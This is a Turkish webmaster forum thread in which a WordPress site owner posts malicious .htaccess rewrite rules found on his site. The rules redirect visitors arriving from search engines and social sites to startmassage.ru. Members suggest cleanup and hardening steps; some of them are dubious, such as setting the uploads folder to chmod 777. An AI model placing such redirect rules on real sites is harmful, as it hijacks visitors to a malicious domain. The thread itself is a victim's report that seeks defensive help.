lostyazilim

Siteme Öyle Bir Kod Atmışlarki..

9 Mesajlar 1.832 Okunma
lstbozum
wmaraci reklam

RuZzGaR RuZzGaR Aaltintas(){ //WmAracı Kullanıcı
  • Üyelik 22.08.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Front-end
  • Konum Denizli
  • Ad Soyad A** A**
  • Mesajlar 1243
  • Beğeniler 384 / 148
  • Ticaret 3, (%100)
İyi günler
geçenlerdede konu açmıştım sitem yönleniyor diye
en sonunda buldum kodu htacsess'deymiş ama kodu bi gördüm şok oldum

bu sitelerden siteme girildiği zaman direk http://startmassage.ru yönleniyor :D



RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://startmassage.ru/upday/index.php [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
 

 

wmaraci
reklam

Zargana Zargana WM Aracı Kullanıcı
  • Üyelik 18.12.2011
  • Yaş/Cinsiyet 49 / E
  • Meslek Serbest
  • Konum Giresun
  • Ad Soyad Y** U**
  • Mesajlar 994
  • Beğeniler 9 / 303
  • Ticaret 11, (%100)
Anladığım kadarıyla adres satırına adres doğrudan yazıldığında yönlendirme olmuyor ama google, facebook gibi sitelerden yönlendirme yapıldığında farklı bir adrese yönleniyorsun. Eğer durum yazdığım gibiyse öncelikli olarak sunucunun PHP sürümüne bak. 5.2.x sürümlerinde bir açık var ve çoğu zaman kaynağı bu açık. 5.3 yükseltmesi yapılmadan çözümü çok zor.

İkinci olarak Malwarebytes'ı indirip sitene FTP kanalıyla eriştiğin bütün bilgisayarları tarattır. Kullandığın bilgisayarda sorun olabilir.
 

 

Ne ekersen onu biçersin

RuZzGaR RuZzGaR Aaltintas(){ //WmAracı Kullanıcı
  • Üyelik 22.08.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Front-end
  • Konum Denizli
  • Ad Soyad A** A**
  • Mesajlar 1243
  • Beğeniler 384 / 148
  • Ticaret 3, (%100)
Malwarebytes'ı indirdim şuan tarıyor fakat ne işe yarıyor pek anlamadım açıkcası bide sitem wordpress php sürümü nasıl yapıcam ?
 

 

Zargana Zargana WM Aracı Kullanıcı
  • Üyelik 18.12.2011
  • Yaş/Cinsiyet 49 / E
  • Meslek Serbest
  • Konum Giresun
  • Ad Soyad Y** U**
  • Mesajlar 994
  • Beğeniler 9 / 303
  • Ticaret 11, (%100)
PHP için sen bir şey yapamazsın. Hosting firmanın sürüm yükseltmesi yapması gerekiyor. Aynı sorun benim başıma geldiğinde konuyu araştırıp hosting firmama bildirdim. Onlar da aynı bulgulara erişince PHP sürümünü 5.3 yaptılar. O zamandan beri sorun yok ama sen FTP kullandığın bilgisayarlarda mutlaka Malwarebytes ile tarama yap. Benim daha önce açtığım konu burada.
http://wmaraci.com/forum/wordpress/finditnow-osa-pl-hack-sorunu-21230.html

Ve Bulletproof gibi bir WP eklentisi kurmanı öneriyorum
 

 

Ne ekersen onu biçersin
wmaraci
wmaraci

RuZzGaR RuZzGaR Aaltintas(){ //WmAracı Kullanıcı
  • Üyelik 22.08.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Front-end
  • Konum Denizli
  • Ad Soyad A** A**
  • Mesajlar 1243
  • Beğeniler 384 / 148
  • Ticaret 3, (%100)
tamam yaptım o dediklerinizi saolun
 

 

http http cokkisiselbisey Kullanıcı
  • Üyelik 05.02.2012
  • Yaş/Cinsiyet 36 / E
  • Meslek
  • Konum
  • Ad Soyad ** **
  • Mesajlar 253
  • Beğeniler 24 / 36
  • Ticaret 0, (%0)
bunda hata varmı pekı sankı aynı gozukuo




# BEGIN WPSuperCache

RewriteEngine On
RewriteBase /
#If you serve pages from behind a proxy you may want to change 'RewriteCond %{HTTPS} on' to something more sensible
RewriteCond %{REQUEST_URI} !^.*[^/]$
RewriteCond %{REQUEST_URI} !^.*//.*$
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{QUERY_STRING} !.*=.*
RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress_logged_in|wp-postpass_).*$
RewriteCond %{HTTP:X-Wap-Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP:Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cellphone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800).* [NC]
RewriteCond %{HTTP_user_agent} !^(w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap|sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-).* [NC]
RewriteCond %{HTTP:Accept-Encoding} gzip
RewriteCond %{HTTPS} on
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/$1/index-https.html.gz -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{HTTP_HOST}/$1/index-https.html.gz" [L]

RewriteCond %{REQUEST_URI} !^.*[^/]$
RewriteCond %{REQUEST_URI} !^.*//.*$
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{QUERY_STRING} !.*=.*
RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress_logged_in|wp-postpass_).*$
RewriteCond %{HTTP:X-Wap-Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP:Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cellphone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800).* [NC]
RewriteCond %{HTTP_user_agent} !^(w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap|sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-).* [NC]
RewriteCond %{HTTP:Accept-Encoding} gzip
RewriteCond %{HTTPS} !on
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html.gz -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html.gz" [L]

RewriteCond %{REQUEST_URI} !^.*[^/]$
RewriteCond %{REQUEST_URI} !^.*//.*$
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{QUERY_STRING} !.*=.*
RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress_logged_in|wp-postpass_).*$
RewriteCond %{HTTP:X-Wap-Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP:Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cellphone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800).* [NC]
RewriteCond %{HTTP_user_agent} !^(w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap|sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-).* [NC]
RewriteCond %{HTTPS} on
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/$1/index-https.html -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{HTTP_HOST}/$1/index-https.html" [L]

RewriteCond %{REQUEST_URI} !^.*[^/]$
RewriteCond %{REQUEST_URI} !^.*//.*$
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{QUERY_STRING} !.*=.*
RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress_logged_in|wp-postpass_).*$
RewriteCond %{HTTP:X-Wap-Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP:Profile} !^[a-z0-9\"]+ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cellphone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800).* [NC]
RewriteCond %{HTTP_user_agent} !^(w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap|sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-).* [NC]
RewriteCond %{HTTPS} !on
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html" [L]


# END WPSuperCache
 

 

Emreee Emreee Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 19.10.2011
  • Yaş/Cinsiyet 37 / E
  • Meslek Bilgisayar
  • Konum
  • Ad Soyad ** **
  • Mesajlar 564
  • Beğeniler 160 / 115
  • Ticaret 0, (%0)
Wordpress kurduktan sonra

Tüm klasörlerinizi 755 olarak ayarlayın.
Tüm dosyalarınızı 644 olarak ayarlayın.
.htacsess (kalıcı bağlantı ayarınızda değişiklik yaptığınız zaman dosya çalışır) çok sık kalıcı bağlantı ayarlarınızı güncellemiyorsanız .htacsess dosyasınıda 644 yapın.

Chmod 777 olacak tek dosyanız Resimleri, sıkıştırılmış dosyalarınızı (upload edilen dosya) hangi klasörde paylaşıyorsanız o klasörün chmod değerini 777 olarak ayarlayın.

Onun haricinde FTP ve Plesk / Cpanel gibi bilgilerinizin şifresini 123456 yapmayın :)
 

 

Codex Codex Web Developer Kullanıcı
  • Üyelik 21.07.2011
  • Yaş/Cinsiyet 40 / E
  • Meslek Web Developer
  • Konum Ankara
  • Ad Soyad Y** D**
  • Mesajlar 8
  • Beğeniler 3 / 3
  • Ticaret 1, (%100)
Hosting firmasıyla sorununu halledemez isen ayrıca wp-congif.php içerisinde şifrelenmiş kodlar göreceksin onları sil.

.htaccess içendeki kodları da sil. Veri tabanının yedeğini al yeni veri tabanı oluştur yedekleri yükle wp-config.php ayarları uygula.

.htaccess aç ve aşağıdaki kodları ekle.

# Sunucu imzasını kaldır
ServerSignature Off

# Dosya yükleme boyutunu 10mb ile sınırlandır
LimitRequestBody 10240000

# Dizin listelemeyi iptal et
Options All -Indexes

# Dosya erişimlerini engelle


order allow,deny
deny from all



order allow,deny
deny from all



order allow,deny
deny from all


Ayrıca Kök dizine w233wfr.php gibi dosyalar da ekliyor dikkat et.

Büyük ihtimalle sorun ortadan kalkacaktır.

Ek Olarak:

Emre adlı üyeden alıntı

Wordpress kurduktan sonra

Tüm klasörlerinizi 755 olarak ayarlayın.
Tüm dosyalarınızı 644 olarak ayarlayın.
.htacsess (kalıcı bağlantı ayarınızda değişiklik yaptığınız zaman dosya çalışır) çok sık kalıcı bağlantı ayarlarınızı güncellemiyorsanız .htacsess dosyasınıda 644 yapın.

Chmod 777 olacak tek dosyanız Resimleri, sıkıştırılmış dosyalarınızı (upload edilen dosya) hangi klasörde paylaşıyorsanız o klasörün chmod değerini 777 olarak ayarlayın.

Onun haricinde FTP ve Plesk / Cpanel gibi bilgilerinizin şifresini 123456 yapmayın :)



Hiç Alakası yok kardeşim zaten .htaccess dosyasını 444 olarak kendisi otomatik ayarlıyor kodları yerleştirdikten sonra :)
 

 

Emreee Emreee Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 19.10.2011
  • Yaş/Cinsiyet 37 / E
  • Meslek Bilgisayar
  • Konum
  • Ad Soyad ** **
  • Mesajlar 564
  • Beğeniler 160 / 115
  • Ticaret 0, (%0)

Codex adlı üyeden alıntı

Hiç Alakası yok kardeşim zaten .htaccess dosyasını 444 olarak kendisi otomatik ayarlıyor kodları yerleştirdikten sonra :)


Dene bakalım
 

 

wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al